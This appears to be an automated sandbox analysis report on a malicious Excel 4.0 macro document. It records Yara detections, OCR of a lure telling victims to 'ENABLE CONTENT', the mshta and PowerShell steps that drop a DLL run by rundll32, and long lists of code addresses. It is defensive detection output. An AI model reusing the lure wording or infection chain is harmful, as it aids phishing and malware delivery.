                            Source: Yara matchFile source: 0000000C.00000002.577472790.00000000003E0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.523994055.0000000002F10000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.675503420.0000000010001000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.646764610.0000000010001000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.524063481.0000000003151000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.578315852.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000010.00000002.650185514.0000000010001000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.578085930.0000000002870000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.578205625.0000000002F50000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.646533313.00000000025F1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.645994754.0000000000220000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.646245001.00000000004A1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000010.00000002.649670122.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.646590734.00000000029F1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.675011000.0000000000790000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.523320512.0000000000300000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.523188854.0000000000201000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.578029021.00000000027B1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: C:\ProgramData\QWER.dll, type: DROPPED

                            System Summary

                            barindex
                            Found malicious Excel 4.0 Macro
                            Source: imedpub_2.xlsMacro extractor: Sheet: Macro1 contains: mshta
                            Source: imedpub_2.xlsMacro extractor: Sheet: Macro1 contains: mshta
                            Malicious sample detected (through community Yara rule)
                            Source: imedpub_2.xls, type: SAMPLEMatched rule: Detects OLE Excel 4 Macros documents acting as downloaders Author: ditekSHen
                            Source: C:\Users\user\Desktop\imedpub_2.xls, type: DROPPEDMatched rule: Detects OLE Excel 4 Macros documents acting as downloaders Author: ditekSHen
                            Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
                            Source: Screenshot number: 4Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. 19 20 21 22 23 24 25 .
                            Source: Screenshot number: 4Screenshot OCR: DOCUMENT IS PROTECTED. 13 14 15 16 , , Previewing is not available for protected documents. 17
                            Source: Screenshot number: 4Screenshot OCR: protected documents. 17 18 You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to pre
                            Source: Screenshot number: 4Screenshot OCR: ENABLE CONTENT" buttons to preview this document. 19 20 21 22 23 24 25 . J u 26 27 28 29
                            Source: Document image extraction number: 0Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
                            Source: Document image extraction number: 0Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
                            Source: Document image extraction number: 0Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
                            Source: Document image extraction number: 0Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
                            Source: Document image extraction number: 1Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
                            Source: Document image extraction number: 1Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
                            Source: Document image extraction number: 1Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
                            Source: Document image extraction number: 1Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
                            Document contains OLE streams with names of living off the land binaries
                            Source: imedpub_2.xlsStream path 'Workbook' : ........ZO..........................\.p....xXx B.....a.........=.............................................=........p.08.......X.@...........".......................1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................A.r.i.a.l.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...,...6...........C.a.l.i.b.r.i.1.......6...........C.a.l.i.b.r.i.1.......6...........C.a.l.i.b.r.i.1.......>...........C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1.......<...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1.*.h...6...........C.a.l.i.b.r.i. .L.i.g.h.t.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......9...........C.a.l.i.b.r.i...3......#.,.#.#.0.\. .".. ".;.\.-.#.,.#.#.0.\. .".. "...=......#.,.#.#.0.\. .".. ".;.[.R.e.d.].\.-.#.,.#.#.0.\. .".. "...?......#.,.#.#.0...0.0.\. .".. ".;.\.-.#.,.#.#.0...0.0.\. .".. "...I..."..#.,.#.#.0...0.0.\. .".. ".;.[.R.e.d.].\.-.#.,.#.#.0...0.0.\. .".. "...q.*.6.._.-.*. .#.,.#.#.0.\. .".. "._.-.;.\.-.*. .#.,.#.#.0.\. .".. "._.-.;._.-.*. .".-.".\. .".. "._.-.;._.-.@._.-...,.).'.._-* #,##0_-;\-* #,##0_-;_-* "-"_-;_-@_-....,.>.._.-.*. .#.,.#.#.0...0.0.\. .".. "._.-.;.\.-.*. .#.,.#.#.0...0.0.\. .".. "._.-.;._.-.*. .".-.".?.?.\. .".. "._.-.;._.-.@._.-...4.+./.._-* #,##0.00_-;\-* #,##0.00_-;_-* "-"??_-;_-@_-..?...:.._("$"* #,##0.00_);_("$"* \(#,##0.00\);_("$"* "-"??_);_(@_).......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .....
                            Source: imedpub_2.xls.0.drStream path 'Workbook' : ........ZO..........................\.p....user B.....a.........=.............................................=........p.08.......X.@...........".......................1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................A.r.i.a.l.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...,...6...........C.a.l.i.b.r.i.1.......6...........C.a.l.i.b.r.i.1.......6...........C.a.l.i.b.r.i.1.......>...........C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1.......<...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1.*.h...6...........C.a.l.i.b.r.i. .L.i.g.h.t.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......9...........C.a.l.i.b.r.i...3......#.,.#.#.0.\. .".. ".;.\.-.#.,.#.#.0.\. .".. "...=......#.,.#.#.0.\. .".. ".;.[.R.e.d.].\.-.#.,.#.#.0.\. .".. "...?......#.,.#.#.0...0.0.\. .".. ".;.\.-.#.,.#.#.0...0.0.\. .".. "...I..."..#.,.#.#.0...0.0.\. .".. ".;.[.R.e.d.].\.-.#.,.#.#.0...0.0.\. .".. "...q.*.6.._.-.*. .#.,.#.#.0.\. .".. "._.-.;.\.-.*. .#.,.#.#.0.\. .".. "._.-.;._.-.*. .".-.".\. .".. "._.-.;._.-.@._.-...,.).'.._-* #,##0_-;\-* #,##0_-;_-* "-"_-;_-@_-....,.>.._.-.*. .#.,.#.#.0...0.0.\. .".. "._.-.;.\.-.*. .#.,.#.#.0...0.0.\. .".. "._.-.;._.-.*. .".-.".?.?.\. .".. "._.-.;._.-.@._.-...4.+./.._-* #,##0.00_-;\-* #,##0.00_-;_-* "-"??_-;_-@_-..?...:.._("$"* #,##0.00_);_("$"* \(#,##0.00\);_("$"* "-"??_);_(@_).......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .....
                            Powershell drops PE file
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\ProgramData\QWER.dllJump to dropped file
                            Found Excel 4.0 Macro with suspicious formulas
                            Source: imedpub_2.xlsInitial sample: EXEC
                            Source: imedpub_2.xlsInitial sample: EXEC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_100360079_2_10036007
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_100410509_2_10041050
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1003130F9_2_1003130F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_100323E29_2_100323E2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_100304609_2_10030460
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_100415929_2_10041592
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1003E59F9_2_1003E59F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1003960C9_2_1003960C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_100317E29_2_100317E2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10040B0E9_2_10040B0E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10031BB69_2_10031BB6
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10041C569_2_10041C56
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10036CB59_2_10036CB5
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1001CD169_2_1001CD16
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10042D219_2_10042D21
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10031FC29_2_10031FC2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002CF8FD9_2_002CF8FD
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002CE9919_2_002CE991
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002CAB879_2_002CAB87
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002D00019_2_002D0001
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002C90119_2_002C9011
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002D907F9_2_002D907F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002E00569_2_002E0056
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002C20519_2_002C2051
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002D20BA9_2_002D20BA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002C70B39_2_002C70B3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002CF09B9_2_002CF09B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002D41169_2_002D4116
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002C51BB9_2_002C51BB
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002C81B79_2_002C81B7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002C22519_2_002C2251
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002DA2E89_2_002DA2E8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002CE2CC9_2_002CE2CC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002CB2C79_2_002CB2C7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002C53619_2_002C5361
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002C43469_2_002C4346
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002E13AD9_2_002E13AD
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002DC3A09_2_002DC3A0
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002DD3899_2_002DD389
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002DE3959_2_002DE395
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002DF4359_2_002DF435
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002D044F9_2_002D044F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002C64E29_2_002C64E2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002D85199_2_002D8519
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002C55489_2_002C5548
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002CA55F9_2_002CA55F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002D25509_2_002D2550
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002D95FA9_2_002D95FA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002CE5CF9_2_002CE5CF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002DC6319_2_002DC631
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002D86069_2_002D8606
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002DA6669_2_002DA666
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002D66CA9_2_002D66CA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002CD6D89_2_002CD6D8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002D473C9_2_002D473C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002C77359_2_002C7735
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002C97149_2_002C9714
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002D176B9_2_002D176B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002CB74D9_2_002CB74D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002C48169_2_002C4816
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002D18899_2_002D1889
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002C89699_2_002C8969
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002D894B9_2_002D894B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002E09B59_2_002E09B5
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002C59F29_2_002C59F2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002DAA309_2_002DAA30
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002C1A569_2_002C1A56
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002CEA999_2_002CEA99
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002DBB239_2_002DBB23
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002C8B3D9_2_002C8B3D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002D0B199_2_002D0B19
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002CBB7E9_2_002CBB7E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002DCB5B9_2_002DCB5B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002D7BA69_2_002D7BA6
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002D4B879_2_002D4B87
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002C9B839_2_002C9B83
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002DDBEA9_2_002DDBEA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002D8BE39_2_002D8BE3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002D9BCF9_2_002D9BCF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002C2BD99_2_002C2BD9
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002C3C3C9_2_002C3C3C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002DAC3A9_2_002DAC3A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002C7C379_2_002C7C37
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002E0C149_2_002E0C14
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002D6C499_2_002D6C49
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002C4C5D9_2_002C4C5D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002DDCF79_2_002DDCF7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002D5CC49_2_002D5CC4
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002C6D249_2_002C6D24
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002D6DF89_2_002D6DF8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002C9DCF9_2_002C9DCF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002D7DD59_2_002D7DD5
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002DBE279_2_002DBE27
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002C3E3F9_2_002C3E3F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002E0E3A9_2_002E0E3A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002DAE6D9_2_002DAE6D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002C5E609_2_002C5E60
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002D0E539_2_002D0E53
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002CEE819_2_002CEE81
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002D9EEC9_2_002D9EEC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002C4EE39_2_002C4EE3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002CAEFB9_2_002CAEFB
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002DDEDC9_2_002DDEDC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002E0F339_2_002E0F33
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002CCF479_2_002CCF47
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002C7FF29_2_002C7FF2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002CDFF39_2_002CDFF3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00203C3C10_2_00203C3C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0020901110_2_00209011
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0021044F10_2_0021044F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_002120BA10_2_002120BA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0020F8FD10_2_0020F8FD
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0020D6D810_2_0020D6D8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0021411610_2_00214116
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_002213AD10_2_002213AD
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0020AB8710_2_0020AB87
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00207FF210_2_00207FF2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_002059F210_2_002059F2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_002195FA10_2_002195FA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0021BE2710_2_0021BE27
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0021C63110_2_0021C631
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0021AA3010_2_0021AA30
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0021F43510_2_0021F435
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00207C3710_2_00207C37
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00220E3A10_2_00220E3A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0021AC3A10_2_0021AC3A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00203E3F10_2_00203E3F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0021000110_2_00210001
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0021860610_2_00218606
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0020481610_2_00204816
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00220C1410_2_00220C14
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00205E6010_2_00205E60
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0021A66610_2_0021A666
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0021AE6D10_2_0021AE6D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0021907F10_2_0021907F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00216C4910_2_00216C49
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0020205110_2_00202051
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0020225110_2_00202251
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00210E5310_2_00210E53
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0022005610_2_00220056
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00201A5610_2_00201A56
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00204C5D10_2_00204C5D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_002070B310_2_002070B3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0020EE8110_2_0020EE81
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0021188910_2_00211889
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0020EA9910_2_0020EA99
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0020F09B10_2_0020F09B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_002064E210_2_002064E2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00204EE310_2_00204EE3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0021A2E810_2_0021A2E8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00219EEC10_2_00219EEC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0021DCF710_2_0021DCF7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0020AEFB10_2_0020AEFB
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00215CC410_2_00215CC4
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0020B2C710_2_0020B2C7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_002166CA10_2_002166CA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0020E2CC10_2_0020E2CC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0021DEDC10_2_0021DEDC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0021BB2310_2_0021BB23
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00206D2410_2_00206D24
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00220F3310_2_00220F33
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0020773510_2_00207735
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0021473C10_2_0021473C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00208B3D10_2_00208B3D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0020971410_2_00209714
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0021851910_2_00218519
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00210B1910_2_00210B19
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0020536110_2_00205361
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0020896910_2_00208969
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0021176B10_2_0021176B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0020BB7E10_2_0020BB7E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0020434610_2_00204346
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0020CF4710_2_0020CF47
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0020554810_2_00205548
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0021894B10_2_0021894B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0020B74D10_2_0020B74D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0021255010_2_00212550
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0021CB5B10_2_0021CB5B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0020A55F10_2_0020A55F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0021C3A010_2_0021C3A0
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00217BA610_2_00217BA6
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_002209B510_2_002209B5
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_002081B710_2_002081B7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_002051BB10_2_002051BB
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00209B8310_2_00209B83
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00214B8710_2_00214B87
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0021D38910_2_0021D389
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0020E99110_2_0020E991
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0021E39510_2_0021E395
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00218BE310_2_00218BE3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0021DBEA10_2_0021DBEA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0020DFF310_2_0020DFF3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00216DF810_2_00216DF8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00219BCF10_2_00219BCF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00209DCF10_2_00209DCF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0020E5CF10_2_0020E5CF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00217DD510_2_00217DD5
